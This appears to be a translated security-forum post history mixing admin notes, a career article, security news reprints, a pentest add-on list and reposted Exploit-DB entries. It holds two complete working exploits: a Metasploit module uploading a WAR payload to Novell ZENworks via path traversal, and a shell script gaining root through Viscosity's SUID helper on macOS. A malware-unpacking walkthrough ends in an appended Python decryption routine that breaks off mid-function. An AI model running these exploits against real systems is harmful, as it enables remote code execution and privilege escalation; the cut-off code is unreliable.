Everything posted by DarkyAngel
-
Registrations are closed for the moment. If you want an account and don't already have one, write here, or if you want to "invite" a friend, tell an admin about it on the PoS chat.
-
During my years of work as a consultant and trainer in the information security world, I’ve noticed a few patterns that usually exist in those who do very well in the industry vs those who just make it by. I decided to draft this article to share some of the key elements and, more importantly, give somewhat of a metric to gauge where you, the reader, currently sit. Basically there seem to be 4 key levels that I consider to be different milestones or “levels of understanding” as related to this field. I originally heard a concept like this many years ago as it relates to music. Now I’m going to relate this more directly to penetration testing and exploit writing, but you can apply it to any area of specialization in information security. Let’s start with Level 1.

Level 1 – Interested Newbie – Unknowing and Unconscious

You don’t really know how to learn these arts, plus you’re unconscious of the fact that you don’t know. This level is where you’ve probably got your Security+ or you’ve gained the equivalent knowledge base by reading and “tinkering”. You haven’t learned how to exploit anything yet. You know what port scanning is, but you’ve never really done it. You’re familiar with the terms Trojan, malware, rootkit, exploitation, etc. But you haven’t actually had hands on with any of this, at least not knowingly **smile**. Eventually you start playing with some tools. If you’re a person who’s said, “I downloaded Backtrack but I haven’t figured out how to do anything with it yet,” then you most likely fall into this category. Linux is still a big dark scary cloud for you (if you come from a Windows background), and vice versa if you’re a Linux background person. You might have even taken a CEH class, and you feel like you saw a lot of cool stuff, but you can’t really sit down and reproduce much of it.

Level 2 – Practicing Youngster (a year or two in) – Knowing and Unconscious

You now know a little bit about how to learn these techniques, but you’re still unconscious of what you don’t know. You’re still new to the field. You might have a job that requires you to work with firewalls a little, or maybe support of some type. Your inner hacker curiosity has you spending lots of time tinkering with security tools and techniques even though it might not be part of your job. You can run some security tools. You are not “too” afraid of Linux anymore. You’ve been able to get Backtrack to communicate with your network. You’ve learned how to set IP addresses in Linux, and you’re comfortable doing basic things from the shell. You have learned how to use Nmap somewhat. Additionally you’ve also found one or two forums which you like to visit and learn new things from. The information in these forums ends up being pretty basic, but at the level you’re at right now, you’ve found the more advanced forums like the official Metasploit one to be too technical for you. You maybe visit your first Blackhat/Defcon conference. You leave there realizing for the first time how much you really don’t know. You reach a point of information overload. You enjoy the conference and see lots of eye-popping demonstrations, but you don’t really understand how it works or what the implications really are. You leave Blackhat with the gut-punching realization that you lack the technical ability to demonstrate or recreate anything you’ve witnessed. And this is where you actually start to learn.

Level 3 – Serious Practitioner – Knowing and Conscious

At this point you know how to learn the skills, and you’re conscious of the fact that there are limitless amounts of stuff you don’t know, and additionally you have an idea about the many different aspects and fields within information security. You truly grasp that reverse engineering, exploit writing, and penetration testing are not one big blob of variations of the same thing. You realize that they can all complement each other, but they’re not the same. You have gained enough skills to be great one day, but you might not ever truly have the time, or invest the time required, to get to the next level. It’s been a couple of years or so since you went to Blackhat/Defcon the first time. Now you go back and you understand exponentially more than you did the first time. You’re able to come back and duplicate most of what you’ve seen in the presentations. You also understand what you’ve seen well enough to demo and present it to others. If you’ve never learned to code, you have at this point realized that it’s going to hinder you at some point in your career. You’ve started to learn some scripting languages and you’re pretty good with them (Perl, Python, etc.). You’re aggressively trying to learn C, not C+, C++, C# or any of those, but just C. Why? Because a respected security professional told you that you really needed to learn it. You’re also trying to learn Assembly because you’ve been told that you really need to know it to write exploits. You view exploit writing and reversing as the next thing you want to accomplish from a learning perspective. But you’ve realized you need to know programming concepts and constructs well to truly reverse and write exploits. You are able to follow exploit writing examples without problem, but your understanding of memory, calls, packing, etc. keeps you from doing it “for real”. If someone gave you a Backtrack CD and a couple of Windows computers and asked you to demonstrate a client side exploit, a server side exploit, and how scanning works, you could do it with no problem. You know TCP and IP like you know your name. You can look at a packet capture and instantly pick out three-way handshakes and other session establishments. You still don’t really know web applications that well, because you still don’t know programming and applications that well. You can demonstrate fluently all of the OWASP top 10, but you still feel there’s a lot missing. Congratulations, you’ve reached the point where most security professionals stop or plateau.

Level 4 – Expert – Knowing and Unconscious

You are above most in both skill and knowledge. You know that there are things you don’t know, but you learn them frequently. It’s almost as if it’s a drug to you. You sit with your laptop daily/nightly and plug into forums, YouTube videos, presentations, coding etc. Every night for you seems as if you’ve plugged your brain into the Matrix and had information dumped into it. While you know there are things you want to learn, you don’t even know or bother to figure out “how” you’re learning them. Your skills are mature enough to where you just “do”. You learn without knowing how. When you do present or demonstrate stuff to others, you’re often told that you go way too fast and, really, you assume that your audience understands more than they actually do. There is no looking back now. The only thing that really drives you is learning more. You’re also very much into finding new exploits, and finding new ways to use old exploits. While information security may or may not be your job, it is now your passion.

Level 5 – Leader – Unknowing and Unconscious

You are now at the very top of the field. Whether the rest of the world knows it or not is not relevant. You are not conscious of what you don’t know because you simply don’t care. You have obtained a body of knowledge that puts you in a position to where if you want to learn something, you simply learn it. Nothing about exploitation, or information security, seems out of your reach. The only reason you don’t learn something is because you don’t want to. You are now a creator, a driver, and an industry shifter. You are one of the people who puts out what others must learn. The industry doesn’t control what you need to know; you control what the industry needs to know. A few names come to mind for me: HD Moore, Dan Kaminsky and others. For example, Metasploit, the brainchild of HD Moore, literally changed exploitation and exploit development forever. Dan Kaminsky’s DNS research a few years ago caused visible shifts in the attention paid to infrastructure security as related to things like DNS. Most people will never make it to this level. Not because people aren’t smart enough. It’s because maybe you won’t be able to put the time in. Or maybe you won’t have access to the resources needed (some countries filter all Internet traffic). To say HD Moore accomplished what he has simply because he is smart would completely ignore all the obvious huge amounts of time and hard work he’s put in over the years. I think one has to have certain proclivities to reach this level, but I also think the time investment is more important than anything else. Below I created a graphic to illustrate this better.

Original Article
-
EDB-ID: 20502 | CVE: 2011-2653 | OSVDB-ID: 77583
Author: metasploit | Published: 2012-08-15 | Verified:
Exploit Code: | Vulnerable App: N/A

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::EXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Novell ZENworks Asset Management Remote Execution',
          'Description'    => %q{
              This module exploits a path traversal flaw in Novell ZENworks Asset Management 7.5.
            By exploiting the CatchFileServlet, an attacker can upload a malicious file outside
            of the MalibuUploadDirectory and then make a secondary request that allows for
            arbitrary code execution.
          },
          'Author'         =>
            [
              'Unknown',     # Vulnerability discovery
              'juan vazquez' # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2011-2653' ],
              [ 'OSVDB', '77583' ],
              [ 'BID', '50966' ],
              [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ],
              [ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]
            ],
          'Privileged'     => true,
          'Platform'       => [ 'java' ],
          'Targets'        =>
            [
              [ 'Java Universal',
                {
                  'Arch'     => ARCH_JAVA,
                  'Platform' => 'java'
                },
              ]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Nov 02 2011'))

        register_options(
          [
            Opt::RPORT(8080),
            OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])
          ], self.class)
      end

      def exploit
        # Generate the WAR containing the payload
        app_base = rand_text_alphanumeric(4+rand(32-4))
        jsp_name = rand_text_alphanumeric(8+rand(8))
        war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s

        uid = rand_text_alphanumeric(34).to_s

        data = "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"RequestParms\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"rtyp\"\r\n\r\n"
        data << "prod\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"sess\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n"
        data << "newreport\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"dp\"\r\n\r\n"
        data << "n\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"oldentry\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"act\"\r\n\r\n"
        data << "malibu.StartImportPAC\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"saveact\"\r\n\r\n"
        data << "malibu.StartImportPAC\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"isalert\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"queryid\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"Locale\"\r\n\r\n"
        data << "MM/dd/yyyy\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"CurrencySym\"\r\n\r\n"
        data << "$\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"CurrencyPos\"\r\n\r\n"
        data << "start\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"ThousandsSep\"\r\n\r\n"
        data << ",\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"CurDecimalPt\"\r\n\r\n"
        data << ".\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"MinusSign\"\r\n\r\n"
        data << "-\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"sum\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"grp\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"col\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"PreLoadRight\"\r\n\r\n"
        data << "yes\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"uploadFile\"; filename=\"/#{"../" * datastore['DEPTH']}#{app_base}.war\x00.txt\"\r\n"
        data << "Content-Type: application/octet-stream\r\n\r\n"
        data << war_data
        data << "\r\n"
        data << "------#{uid}\r\n"
        data << "Content-Disposition: form-data; name=\"SuccessPage\"\r\n\r\n"
        data << "Html/UploadSuccess.html\r\n"
        data << "------#{uid}--\r\n"

        res = send_request_cgi(
          {
            'uri'    => "/rtrlet/catch",
            'method' => 'POST',
            'ctype'  => "multipart/form-data; boundary=----#{uid}",
            'data'   => data,
          })

        print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")
        select(nil, nil, nil, 10)

        if (res.code == 500)
          print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
          send_request_raw(
            {
              'uri'    => "/#{app_base}/" + "#{jsp_name}" + '.jsp',
              'method' => 'GET',
            })
        else
          print_error("WAR upload failed...")
        end
      end
    end

Source
-
^ ))) do you see when the post is from, by the way? Plus it has already been posted about 3 more times.
-
Happy name day tex, and happy name day to everyone named Maria/Marian!
-
^ these days people even post an introduction just for a +1 post
-
The name that caused one of the biggest scandals of the past year could reappear on the map of the Internet. It is Megaupload, a site that was shut down but which Kim Dotcom reportedly plans to relaunch, according to The Next Web and Gizmodo. "I know you are all waiting for this. It will come. This year. I promise. Bigger, better, faster, 100% safe and unstoppable," he posted on his Twitter page. The Next Web initially interpreted the message as referring to the Megabox project, a music site Kim Dotcom had in the works. "Yes, Megabox is also coming this year," was Kim Dotcom's reply. "That leaves only one door open now. It's Megaupload," Gizmodo wrote. Source
-
Who is learning JavaScript here and should solve the problems based on what they learned, us or you? btw: you wrote: var TotalCosts = function(salary, numWorkers, city) {
-
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

begin 755 test.sh
- -96-H;R`G:&5L;&\G"@``
`
end
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJQKW7HAAoJECCScoklHSf8/aQIAJLnszDUBSN0h7MS18XOOxM9
f1EIMmxYMCc/ZkrpynC0dSduEszlzfL2T/M1q7Eqj4LhDbHRNp0Bt7IEGsHsqcc9
zvZDZ/H90oaZtH+Rgp9FRAtMO7fDnZgZK8CEPj8bJzJbZrQO+LRtY00oYigFpGn4
7gmSn2Y/BBSbmk3J85Lbcsc65WysQeaR4D+H7fSr8t6cNMaJ2223jMN+IK1QTlwq
4fm1CKLsSoNWoyvWM8HLeAhrxdO4w1h1zKis3b83f0bFOGihDiXCfAkwAGASbVY/
9U1+H0Bd2522Zf7mdWfbXQAsrDkKdUOlgnwfnda4oWRYIDBusxP8aA40/wsLS04=
=KHqS
-----END PGP SIGNATURE-----

http://sprunge.us/NONd
-
^ wtf? You want a ban and don't know how to ask for it?
-
EDB-ID: 20485 | CVE: N/A | OSVDB-ID: N/A
Author: zx2c4 | Published: 2012-08-13 | Verified:
Exploit Code: | Vulnerable App:

    #!/bin/sh
    #
    ##########################
    # Viscatory              #
    #                        #
    # zx2c4                  #
    ##########################
    #
    # After the hullabaloo from the Tunnelblick local root, savvy Mac users
    # began defending Viscosity, another OS X VPN client. They figured, since
    # they spent money on Viscosity, surely it would be better designed than
    # the free open-source alternative.
    #
    # Unfortunately, this exploit took all of 2 minutes to find. DTrace for
    # the win. Here, the SUID helper will execute site.py in its enclosing
    # folder. A simple symlink, and we have root.
    #
    # greets to jono
    #
    # Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh

    echo "[+] Crafting payload."
    mkdir -p -v /tmp/pwn
    cat > /tmp/pwn/site.py <<_EOF
    import os
    print "[+] Cleaning up."
    os.system("rm -rvf /tmp/pwn")
    print "[+] Getting root."
    os.setuid(0)
    os.setgid(0)
    os.execl("/bin/bash", "bash")
    _EOF
    echo "[+] Making symlink."
    ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
    echo "[+] Running vulnerable SUID helper."
    exec /tmp/pwn/root

Source
-
At the Black Hat conference last month, PhishMe, a company that teaches security awareness to help users identify phishing and targeted attacks, spoke to 250 security professionals and asked them for basic information on how their organizations deal with, or are impacted by, phishing attacks. As it turns out, it’s a common issue, and most of the basic steps are doing little to lessen the blow.

Nearly 70% of those who spoke to PhishMe said that they encounter phishing messages that slip past anti-spam filters at least a few times a week. Further, 25% of them said that they see them several times a day. Spear phishing has become a popular method of infecting enterprises with malware, according to PhishMe. The survey’s results said that more than one quarter (27%) of those who took part said that top executives or other privileged users had been compromised by spear phishing in the last 12 months. Another 31% said they weren't sure if executives or privileged users had been attacked.

"Many enterprises believe that because they are using spam filtering tools or other email security technologies, they are safe from phishing attacks," said Scott Greaux, Vice President of Product Management & Services at PhishMe. "What we found in our survey is that despite such filters, end users are presented with live, malicious attacks in their inboxes nearly every day."

Additional details from the survey include the fact that awareness training is given yearly (or at least once a year) to 49% of the employees at the respondents’ organizations, while 10% said that no awareness training is given.

"This survey demonstrates with great clarity that phishing attacks – particularly targeted attacks – are getting through to end users with alarming regularity, yet most organizations don't train their users on what the most current attacks look like or how to react to them," added Aaron Higbee, CTO and co-founder of PhishMe.

Source
-
A thief reportedly reaches up to steal a closed-circuit TV camera, not stopping to think that the camera might be taking pictures of him.

I am loath to describe anyone as stupid. Principally because I am acutely aware of my own stupidities. They are several and reveal themselves most days -- last night, for example. However, I feel sure that several people will consider using this hard, unforgiving word to describe the reported behavior of Steven Wardle. Wardle is a 35-year-old man who lives in the Midlands of England. As the Daily Mail tells it, he is something of a thief. His penchant was stealing closed-circuit TV cameras -- perhaps, who knows, to re-sell them.

Still, it isn't necessarily easy or wise to steal CCTV cameras. (To illustrate this, I have embedded footage from previous English miscreants who tried to saw off a pole with a CCTV camera on it.) You often have to climb up walls, drainpipes, or poles. Worse, the cameras might be on and therefore be sending pictures of your straining face back to recording machines. This, sadly, is what happened in the case of Steven Wardle. He was found guilty of stealing nine cameras from doctors' offices, housing association buildings, and council offices. For this crime -- as well as handling stolen license plates and leaving a gas station without paying -- he was given a suspended 24-week jail sentence. I don't think that means suspended from a wall beneath a CCTV camera.

Source
-
The company behind games such as World of Warcraft and Diablo tells customers it believes no financial information was accessed but suggests users change their passwords immediately.

Game maker Blizzard Entertainment's internal network security has been breached, the company informed customers today. While the company behind World of Warcraft and Diablo believes no sensitive financial information was compromised, it said e-mail addresses for non-China Battle.net players and scrambled passwords were stolen, Blizzard President Michael Morhaime said in a company blog post. In addition to the e-mail lists, the company said the personal security question and mobile and dial-in authentication information for users in the United States, Australia, New Zealand, and Latin America were also illegally accessed.

The company said it believes its cryptography techniques will make it very difficult to crack the passwords and hack into accounts. "Based on what we currently know, this information alone is NOT enough for anyone to gain access to Battle.net accounts," Morhaime said in the blog. However, the company is nevertheless recommending that users change their passwords immediately.

The disclosure comes at a time of heightened awareness over password security. Last month, Yahoo confirmed that some 453,000 login credentials stored in plain text were stolen from the Web pioneer's network. Other recent high-profile password thefts at LinkedIn, eHarmony, and Last.fm contributed to approximately 8 million passwords posted in two separate lists to hacker sites in early June.

Source
-
The Ukraine-hosted BitTorrent site came under scrutiny by the local authorities and was ultimately terminated last week; now the international hacking group vows a settling of scores.

Anonymous has promised to bring down its wrath on the Ukrainian government after authorities were said to have taken down the file-sharing site Demonoid last week. "Last week, our generous green friend, the Demonoid, was met with a state sponsored Distributed Denial of Service attack...These illegal actions were then followed up with a raid by Ukraine authorities," the hacking group wrote in a blog post on AnonPR yesterday. "In retaliation for your criminal acts against us and the free flow of information, we have already begun an operation against those responsible. Lazers are already being fired."

Ukraine-hosted Demonoid was taken down last week after local authorities contacted its Internet Service Provider Colocall. According to the BBC, officials then went to Colocall's office and copied data off of its servers. However, Colocall said that it decided to cease Demonoid's service on its own accord. According to the BBC, it said the reason for the termination was due to a "combination of factors" and there were "too many issues for a single customer."

Demonoid was among the Web sites included in the U.S. "Notorious Markets List," which was created to identify "markets, including those on the Internet, which exemplify the problem of marketplaces dealing in infringing goods and helping sustain global piracy." The BitTorrent site was ranked in the top 600 Web sites in global traffic and the top 300 in U.S. traffic.

Anonymous said it will use "any means necessary" to restore Demonoid. "Where one has fallen, many will rise to take their place," it wrote in the blog post. Here are its "#OpDemonoid" objectives:

1) Restore Demonoid services by any means necessary and, if possible, facilitate a series of mirror sites operated by free Anons everywhere. In essence, open source Demonoid.
2) Retaliate against those responsible for the interruption.
3) And Lulz.

According to the BBC, several distributed denial of service, or DDoS, attacks happened over the last week, but none of them has been lasting. Apparently certain Web pages on the Ukrainian Anti-Piracy Association, the Ukrainian Agency for Copyright and Related Rights, and the National Television and Radio Broadcasting Council of Ukraine were unavailable for periods of time but then were restored.

Source
-
The trade commission says that Facebook must now submit to biennial privacy audits and obtain users' express consent before sharing information.

The Federal Trade Commission (FTC) has inked a final settlement with Facebook over the company's privacy practices. Under terms of the settlement, Facebook has agreed to provide users with "clear and prominent notice" anytime their information is shared. But before that can happen, Facebook must obtain its users' "express consent" before sharing any information that exists outside the auspices of its privacy settings. In addition, the agency will force Facebook to maintain a "comprehensive privacy program," and subject its service to biennial privacy audits.

The FTC first announced the settlement with Facebook back in November. Following that, the government organization gave the public time to comment. Today's announcement marks an official end to the investigation, and will now force Facebook to comply. If it doesn't, the company could be subject to civil penalties of up to $16,000 for each violation of the order.

The agency kicked off its investigation into Facebook's privacy practices back in 2009 after several watchdogs filed a complaint charging the social network with exposing information users had previously set to private. Facebook also claimed that third-party apps' access to user information would be limited to what was necessary to operate. However, the apps were able to access nearly all of the users' personal data, the FTC reported in its findings.

The FTC yesterday settled another privacy complaint it had launched against Google over the search company's alleged user tracking in Apple's Safari browser. Unlike the Facebook settlement, Google was hit with a $22.5 million fine -- the largest ever for violation of the agency's order. As with the Google deal, the FTC says that its settlement with Facebook is in the public's interest. However, the agency made it clear that if Facebook doesn't adhere to its order, it will take action.

"We intend to monitor closely Facebook's compliance with the order, and will not hesitate to seek civil penalties for any violations," the agency's commissioners wrote today in a joint statement. "We are pleased that the settlement, which was announced last November, has received final approval," Facebook told CNET in an e-mailed statement.

This story has been updated throughout the morning.

Source
-
The majority of penetration testers use Mozilla Firefox as the web browser for their pentest activities. This article will introduce the Firefox add-ons that can be used for a web application penetration test.

1) Firebug – Useful as a debugging tool that can help you track rogue JavaScript code on servers.
2) User Agent Switcher – You can use this extension to change the user agent of your browser. Useful for web application penetration tests where you also want to check the mobile versions of the websites.
3) Hackbar – Useful for SQL injection and XSS attacks. It also includes tools for URL and HEX encoding/decoding and many more.
4) HttpFox – Monitor and analyze all the incoming and outgoing HTTP traffic between your browser and the web server.
5) Live HTTP Headers – View the HTTP headers of a website instantly.
6) Tamper Data – View and modify HTTP/HTTPS headers and POST parameters.
7) ShowIP – Shows the IP of the current page in the status bar. It also includes information like the hostname, the ISP, the country and the city.
8) OSVDB – Open Source Vulnerability Database search.
9) Packet Storm search plugin – Search the Packet Storm database for exploits, tools and advisories.
10) Offsec Exploit-db Search – Search the Exploit-db archive.
11) Security Focus Vulnerabilities Search Plugin – Search for vulnerabilities in Security Focus.
12) Cookie Watcher – Watch the selected cookie in the status bar.
13) Header Spy – Shows HTTP headers on the status bar.
14) Groundspeed – Manipulate the application user interface.
15) CipherFox – Displays the current SSL/TLS cipher and certificate on the status bar.
16) XSS Me – Tool for testing reflected XSS vulnerabilities.
17) SQL Inject Me – Extension to test SQL injection vulnerabilities.
18) Wappalyzer – Discover technologies and applications that are used on websites.
19) Poster – Make HTTP requests, interact with web services and watch the output.
20) Javascript Deobfuscator – Show the JavaScript code that is running on web pages.
21) Modify Headers – Modify HTTP request headers.
22) FoxyProxy – Advanced proxy management tool.
23) FlagFox – Displays a country flag for the location of the web server. It also includes tools such as Whois, Geotool, Ping, Alexa etc.
24) Greasemonkey – Customize the way a webpage behaves by using small bits of JavaScript.
25) Domain Details – Displays server type, headers, IP address, location flag, and links to Whois reports.
26) Websecurify – Useful for security assessments of web applications.
27) XSSed Search – Search the cross-site scripting database at XSSed.com.
28) ViewStatePeeker – ASP.NET ViewState viewer.
29) CryptoFox – An encryption/decryption tool for cracking MD5 passwords.
30) WorldIP – Location of the web server, IP, datacenter, ping, traceroute, RDNS, AS etc.
31) Server Spy – Unveils the technology of the web server (Apache, IIS etc.).
32) Default Passwords – Search the CIRT.net default password database.
33) Snort IDS Rule Search – Search for Snort IDS rules.

Source
-
In the last installment, we examined the PEB Loader Data Structure. We take up the discussion here. Locate and Isolate the Embedded Decrypted Executable Once the VAs of the necessary APIs are stored, we are back to the next instruction after the CALL at address 004085CD that we mentioned earlier. The piece of code that follows is also of great interest: 004085D2 64A1 30000000 MOV EAX, DWORD PTR FS:[30] ß get address of PEB 004085D8 8B40 08 MOV EAX, DWORD PTR DS:[EAX+8] ß get self image base from PEB (main module) 004085DB 8983 38153A00 MOV DWORD PTR DS:[EBX+3A1538], EAX ß store self image base 004085E1 8BBB 38153A00 MOV EDI, DWORD PTR DS:[EBX+3A1538] ß move self image base to EDI 004085E7 03BB 60153A00 ADD EDI, DWORD PTR DS:[EBX+3A1560] ß add EDI a constant (AE000) The following five instructions are another example of obfuscation. The final result is always 10000, so it could just do MOV ESI, 10000. However, this could be a dynamic calculation of the size of the area needed to allocate based on the characteristics of the file wrapped with this loader. 004085ED BE 61010000 MOV ESI, 161 004085F2 03B3 5C153A00 ADD ESI, DWORD PTR DS:[EBX+3A155C] 004085F8 03B3 6C153A00 ADD ESI, DWORD PTR DS:[EBX+3A156C] 004085FE 81C6 00000100 ADD ESI, 10000 00408604 81E6 0000FFFF AND ESI, FFFF0000 Then uses VirtualAlloc API to allocate some extra memory with PAGE_EXECUTE_READWRITE access rights. 0040860A 6A 40 PUSH 40 0040860C 68 00300000 PUSH 3000 00408611 56 PUSH ESI 00408612 6A 00 PUSH 0 00408614 FF93 25153A00 CALL NEAR DWORD PTR DS:[EBX+3A1525] ß points to Imports Table above, at the address of the VirtualAlloc API. Once the new memory area is allocated, it will start writing some code there. The first code transfer takes place a few instructions later. 00408631 F3A4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to 00408993, EDI is whatever address was returned by the VirtualAlloc API, and ECX which is the counter is 161. 
The next code transfer to the allocated memory area:

    0040865C F3A4               REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]

← ESI points to 00402488, EDI is whatever address was returned by the VirtualAlloc API + 4349, and ECX this time is BE.

Next code transfer:

    0040866A F3A4               REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]

← ESI points to 00403140, EDI is whatever address was returned by the VirtualAlloc API + 4407, and ECX this time is 17B7.

Next code transfer:

    00408678 F3A4               REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]

← ESI points to 00406028, EDI is whatever address was returned by the VirtualAlloc API + 5BBE, and ECX this time is 255C.

The next interesting part of the loader's code is at address 0040868C, where it calls a function that decrypts a portion of the code transferred to the previously allocated memory area.

    0040896E 89CE               MOV ESI, ECX
    00408970 83E6 03            AND ESI, 3
    00408973 75 12              JNZ SHORT 00408987
    00408975 8B5D 10            MOV EBX, DWORD PTR SS:[EBP+10]
    00408978 6601DA             ADD DX, BX
    0040897B 6BD2 03            IMUL EDX, EDX, 3
    0040897E 66F7D2             NOT DX
    00408981 C1CA 07            ROR EDX, 7
    00408984 8955 10            MOV DWORD PTR SS:[EBP+10], EDX
    00408987 3010               XOR BYTE PTR DS:[EAX], DL     ← after a few calculations, XOR the byte at the memory location pointed to by EAX with the value in DL; the starting address is 002D4349
    00408989 40                 INC EAX
    0040898A C1CA 08            ROR EDX, 8
    0040898D E2 DF              LOOPD SHORT 0040896E          ← loop 3DD1 times

Once we exit this function, we meet another code transfer.

    004087CA A4                 MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI]

← ESI points to the memory area on which the previous function was performing the decryption; EDI is whatever address was returned by the VirtualAlloc API + 161; ECX, the counter, is equal to 3DD1 here.

Before continuing, let's take a look at what the decrypted code that is going to be transferred looks like. I am only showing a small block from the beginning of it.
    002D4349 M8Z€8gÿ@Ñxá.ã€.º|.´.Í!¸`L.This prog3amÃc£n§tóbe×
    002D4389 çu¯ÌiD?OS.mode…V$DPELÅrOXàà9 sSC…*ÊØ&™’ð<0Vž@‚;¯
    002D43C9 ‚”ÁR h>@m!.*h?Äx¼1Î0.tXŸ4FkðUPXW0íC’‰`™àQ1?‘Èð”8(¨@ˆ.rrsRc
    002D4409 ÝÌV+àÀ3.0P4}!…²7{ïIØÎÙBbh6!è€.È×þÿU‰åìÇ…ðûßÀ

Well, it looks like the decrypted code is an executable module, but obviously it is not yet properly reconstructed in memory. The code that follows aims to reconstruct the decrypted executable in memory, and the following block shows the beginning of the executable after this has been done.

    002D0161 MZ€……ÿÿ..@……@……………………………..€…
    002D01A1 º.´.Í!¸LÍ!This program cannot be run in DOS mode…$……..
    002D01E1 PE..L.ÅrO……..à. C.@……à..€&..ð…0…@…….
    002D0221 ……………@…………………………………
    002D0261 ¼1…..0.¼…………………………………………..
    002D02A1 ………………………………………………..UPX0….
    002D02E1 .à……………………€..àUPX1…..@…ð…8…………..
    002D0321 ….@..à.rsrc…….0…..:…………..@..À3.04.UPX!..²7{ ´BÛš§‹öò.ïwgˆ@ªpàÈà–àörÝw.

It is quite obvious that the loader just decrypted a UPX packed executable module. When this happens, the most common scenarios are: to dump this memory area to a new file and launch a child process, or to transfer execution directly to the entry point of the decrypted executable in memory. In any case, we are going to need this executable in order to analyse the next stage, so I am going to isolate it from memory in two simple steps. First, I am going to dump the whole allocated memory area, because I know the executable is there, and then I will cut off all the prepended code that I don't need anymore and save the file. The following figure demonstrates the second step:

At this point we can directly start working on the UPX packed executable we just saved, since the loader is going to jump to its entry point in memory anyway, after writing its code from the allocated memory inside its own PE image address space.

    002D006A FFE1               JMP NEAR ECX                  ← jump to the entry point of the UPX packed file
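As an added example (not code from the original article), the byte-wise decryption routine at 0040896E-0040898D is re-implemented in Python below with the 32-bit register arithmetic emulated, so that a buffer dumped from the allocated region can be decrypted offline. The initial EDX value and the dword kept at [EBP+10] are not visible in the listing and are taken as parameters here; the sample buffer is constructed.

```python
# Added example, not the loader's own code: Python emulation of the Matsnu
# loader's decryption loop (0040896E-0040898D). Key material assumptions:
# `edx` is the value in EDX on entry and `saved` is the dword at [EBP+10];
# neither is shown in the listing, so both are plain parameters.

def ror32(value: int, bits: int) -> int:
    """32-bit rotate right, as the x86 ROR instruction does on EDX."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def matsnu_keystream(count: int, edx: int, saved: int) -> bytes:
    """Return the `count` key bytes (the DL values) the routine XORs into memory.

    ECX runs from `count` down to 1 (LOOPD decrements after each pass).
    On every pass where ECX & 3 == 0 the key is first rescheduled:
        ADD DX, BX ; IMUL EDX, EDX, 3 ; NOT DX ; ROR EDX, 7 ; MOV [EBP+10], EDX
    Every pass then emits DL and rotates EDX right by 8.
    """
    out = bytearray()
    edx &= 0xFFFFFFFF
    for ecx in range(count, 0, -1):
        if ecx & 3 == 0:
            # ADD DX, BX: 16-bit add, upper half of EDX untouched
            dx = ((edx & 0xFFFF) + (saved & 0xFFFF)) & 0xFFFF
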